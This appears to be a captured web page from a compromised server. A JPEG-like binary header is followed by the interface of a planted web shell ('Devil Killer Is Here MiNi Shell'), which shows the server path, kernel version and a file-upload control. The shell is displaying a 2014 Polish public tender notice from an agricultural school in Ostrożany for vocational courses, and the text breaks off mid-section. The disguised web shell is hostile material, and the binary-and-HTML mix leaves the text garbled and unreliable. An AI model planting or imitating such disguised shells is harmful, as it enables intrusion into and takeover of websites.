JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/99505-N-2014.html

<p class="kh_header"><b>Drohiczyn: Organizacja i przeprowadzenie zajęć i kursów ukierunkowanych na rozwój wiedzy i umiejętności zawodowych w ramach projektu Kompetencje kluczowe drogą do kariery  realizowanego przez Zespół Szkół Rolniczych im. W. Witosa w Ostrożanach, w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</b><br>
<b>Numer ogłoszenia: 99505 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Rolniczych , Ostrożany 41, 17-312 Drohiczyn, woj. podlaskie, tel. 85 6551401, faks 85 6551401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zsrostrozany.edupage.org/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła-jednostka administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie zajęć i kursów ukierunkowanych na rozwój wiedzy i umiejętności zawodowych w ramach projektu Kompetencje kluczowe drogą do kariery  realizowanego przez Zespół Szkół Rolniczych im. W. Witosa w Ostrożanach, w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów ukierunkowanych na rozwój wiedzy i umiejętności zawodowych w ramach projektu Kompetencje kluczowe drogą do kariery  realizowanego przez Zespół Szkół Rolniczych im. W. Witosa w Ostrożanach w ramach Priorytetu IX POKL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, tj.: 
1)	Kursu barmańskiego w wymiarze 36 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z dwóch grup (1 grupa =15 osób)  z zapewnieniem materiałów szkoleniowych/dydaktycznych  po jednym komplecie dla każdego uczestnika,  
2)	Kursu carvingu I stopnia w wymiarze 8 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z 2 grup (1 grupa = 7 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika,
3)	 Kurs Carvingu II stopnia w wymiarze 9 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z dwóch grup (1 grupa = 7 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika, 
4)	Kurs kierowca wózków jezdniowych z napędem silnikowym wraz ze zmiennym wysięgiem (ładowarki) w wymiarze 67 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z 2 grup (1 grupa = 12 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika. 
5)	Kurs obsługa kombajnów zbożowych i sieczkarni polowych w wymiarze 32 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z 2 grup (1 grupa = 12 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.20.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże (przedstawi), iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
w tym okresie świadczył lub świadczy:
co najmniej 2 usługi o zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia tj. usług polegających na organizacji i przeprowadzeniu kursów będących przedmiotem zamówienia. Zamawiający uzna za usługę odpowiadającą swoim rodzajem usługi podobne do objętych przedmiotem zamówienia. Jednocześnie zamawiający wskazuje, że przez usługę podobną należy rozumieć kurs zawierający tematykę (moduły) będące przedmiotem zamówienia dla grupy minimum 7 osobowej i o wartości przynajmniej 10 000,00zł. brutto w każdej części przedmiotu zamówienia, gdzie uczestnikami szkoleń była młodzież szkół ponadgimnazjalnych lub dorośli.  
Należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, (przedstawi) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:
tj. - co najmniej jedną osobą posiadającą ukończony kurs z danej części zamówienia i przeprowadziła co najmniej jeden kurs z zakresu danej części zamówienia - dotyczy wszystkich części  zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian ustaleń niniejszej umowy w stosunku do treści oferty na podstawie której Wykonawca został wybrany do realizacji umowy w następującym zakresie: 
Konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie;
Konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie sprawozdawczości;
W przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
zmiany organizacji prawnej Wykonawcy, 
uzasadnionej zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia, na inne legitymujące się co najmniej równoważnym doświadczeniem zawodowym, które wymagane było przez Zamawiającego w ogłoszeniu SIWZ, tj. można dokonać, gdy wynikają one z przyczyn losowych, całkowicie niezależnych od Wykonawcy, ze względów zdrowotnych, rodzinnych lub zawodowych. W związku z powyższym Wykonawca zobowiązany będzie uzyskać pisemną zgodę od Zamawiającego, występując do niego z informacją o zmianie osób realizujących szkolenie. 
W piśmie Wykonawca zobowiązany będzie wskazać:
przyczyny niedostępności osoby(ób) zastępowanej(ych), 
kogo będzie(ą) miała(y) ona(e) zastąpić,
okres zastępstwa,
a także zobowiązany będzie przedstawić Zamawiającemu wypełniony załącznik nr 3 do SIWZ.

Powyższe zmiany nie wymagają aneksu do umowy. 
zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. 
Zmiany miejsca realizacji zamówienia można dokonać, gdy wynikają one z przyczyn losowych całkowicie niezależnych od Wykonawcy, w przypadku awarii sali lub budynku, uniemożliwiającej przeprowadzenie zajęć.  
Zmiana postanowień umowy, o których mowa  może nastąpić w okresie obowiązywania umowy, na podstawie uzasadnionego pisemnego wystąpienia jednej ze stron niezwłocznie po zaistnieniu okoliczności powodujących zmianę umowy. 
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W tym przypadku, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
W sprawach nieuregulowanych w umowie będą miały zastosowanie w szczególności przepisy ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013r, poz. 907) oraz przepisy kodeksu cywilnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsrostrozany.edupage.org/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Rolniczych im.W. Witosa w Ostrożanach, Ostrożany 41, 17-312 Drohiczyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2014 godzina 09:00, miejsce: Zespół Szkół Rolniczych im.W. Witosa w Ostrożanach, Ostrożany 41, 17-312 Drohiczyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Kompetencje kluczowe drogą do kariery
współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, 
Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie Kursu barmańskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie Kursu barmańskiego w wymiarze 36 godzin (dydaktycznych = 45 min.) dla każdej z dwóch grup każda po 15 osób tj. 30 uczniów i uczennic  z zapewnieniem materiałów szkoleniowych/dydaktycznych  po jednym komplecie dla każdego uczestnika.
Kurs ma odbywać się po obowiązkowych zajęciach lekcyjnych lub/i w dni wolne od zajęć lekcyjnych w siedzibie Zamawiającego bądź w formie wyjazdowej, wówczas należy uwzględnić koszt przewozu uczestników kursu do miejsca prowadzenia kursu. 
Zamawiający udostępnia bezpłatnie sale do przeprowadzenia wykładów i zajęć praktycznych. 
Obowiązki Wykonawcy :
W ramach organizacji i realizacji kursu wykonawca ma obowiązek zapewnić Wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację szkolenia stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.
Wykonawca ma obowiązek opracować autorski program kursu, który będzie obejmował co najmniej niżej wskazane bloki:
wprowadzenie do zawodu barmana,
terminologia i funkcjonowanie sprzętu barowego oraz rodzaje stosowanego szkła, miary barowe.
alkoholoznawstwo.
miksologia - zasady komponowania napojów mieszanych,
zajęcia z miksologii,
zasady podawania napojów alkoholowych,
dekoracje,
odpowiedzialne serwowanie alkoholu,
organizacja baru i pracy barmana (w tym podstawy zarządzania barem),
podstawowe triki barmańskie,
savoir vivre podczas obsługi gości 
Metody pracy w trakcie kursu:
zajęcia teoretyczne ograniczone do minimum
ćwiczenia praktyczne
Kurs zostanie zakończony egzaminem wewnętrznym. 
Wykonawca zapewni w trakcie trwania kursu warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy oraz jeżeli to konieczne odzież ochronną i sprzęt ochronny. Wykonawca winien dla każdego uczestnika kursu zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek. 
Wykonawca w pierwszym dniu, przed rozpoczęciem kursu jest zobowiązany zapoznać uczestników z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć. 
Wykonawca zapewni każdemu uczestnikowi kursu materiały szkoleniowe/dydaktyczne na zajęcia praktyczne i teoretyczne np. płyty CD z materiałami ćwiczeniowymi, kserokopie prezentacji, teczki, materiały piśmiennicze potrzebne do prowadzenia notatek (notatnik, długopis).
Wykonawca zobowiązuje się do prowadzenia a po zakończeniu kursu przekazanie zamawiającemu następującej dokumentacji przebiegu kursu: 
dzienników zajęć edukacyjnych zawierających wymiar godzin i tematy zajęć edukacyjnych,
list obecności,
protokołów z przebiegu egzaminów  
imiennego wykazu osób, które ukończyły kurs, nie ukończyły kursu, nie zdały egzaminu, bądź nie przystąpiły do egzaminu, rejestru wydanych zaświadczeń, certyfikatów potwierdzających ukończenie kursu i uzyskanie kwalifikacji.   
Rekrutację na kurs przeprowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.
Wykonawca zapewni nadzór wewnętrzny i wskaże w miejscu szkolenia osobę odpowiedzialną za obsługę szkolenia i kontaktu z uczestnikami szkolenia oraz Zamawiającym
Wykonawca zorganizuje kurs w siedzibie Zamawiającego. W przypadku gdy Wykonawca zorganizuje kurs poza siedzibą Zamawiającego zobowiązany jest  do zorganizowania na własny koszt każdorazowego  transportu, dla każdego uczestnika na trasie: Ostrożany - miejsce kursu - Ostrożany. Wykonawca zobowiązany jest uwzględnić koszt transportu uczniów w cenie za zorganizowanie kursu dla 1 ucznia.
Wykonawca uwzględni w cenie koszt ubezpieczenia uczniów a także pozostałe koszty organizacyjne. 
Wykonawca w cenie  uwzględni koszt produktów koniecznych do prawidłowej realizacji kursu tj. sprzętu, urządzeń mechanicznych i wszelkich innych przyrządów, materiałów i produktów żywnościowych niezbędnych do prawidłowego zrealizowania programu kursu. W przypadku stwierdzenia przez Zamawiającego, że Wykonawca wykorzystuje podczas prowadzenia kursu jakikolwiek składnik przeterminowany, nieświeży lub z innego powodu nie nadający się do spożywania, lub wykorzystuje substytuty (zamienniki) składników właściwych Zamawiający może żądać przerwania zajęć do czasu dostarczenia odpowiedniego składnika przez Wykonawcę, a w przypadku powtarzania się tego rodzaju sytuacji lub zaistnienia w związku z tym zagrożenia dla zdrowia lub życia uczestników kursu wypowiedzieć zawartą z nim umowę w trybie natychmiastowym,
Wykonawca zobowiązany jest do zapewnienia cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: Obiad:
gorący posiłek (zupa+drugie danie) na początku szkolenia dla każdego uczestnika kursu - w przypadku kursu przeprowadzanego po zajęciach obowiązkowych. Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas kursu. Obiady powinny być zróżnicowane. Dany obiad  nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana :
po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika.
Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia.
Każdy uczestnik po zakończeniu kursu musi otrzymać zaświadczenie o jego ukończeniu w myśl Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U z 2012 poz. 186) i certyfikat potwierdzający nabyte umiejętności zawierający logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, wraz ze szczegółową tematyką kursu , liczbą godzin, przypadającą na poszczególne tematy. 
 W pomieszczeniach, w których będą realizowane kursy będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Szczegółowy harmonogram realizacji przedmiotu zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - po podpisaniu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie Kurs Carvingu I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie Kursu Carvingu I stopnia w wymiarze 8 godzin  dydaktycznych ( 1 godzina=45 min) dla każdej z dwóch grup każda po 7 osób tzn. dla 14 uczniów i uczennic Technikum w Zespole Szkół Rolniczych im. W. Witosa w Ostrożanach. 
Kurs ma odbywać się po obowiązkowych zajęciach lekcyjnych lub i w dni wolne od zajęć lekcyjnych w siedzibie Zamawiającego 
Zamawiający udostępnia bezpłatnie sale do przeprowadzenia wykładów i zajęć praktycznych. 
Obowiązki Wykonawcy : 
Zapewnienie na własny koszt wszystkich elementów związanych z realizacją zamówienia, to jest w szczególności:
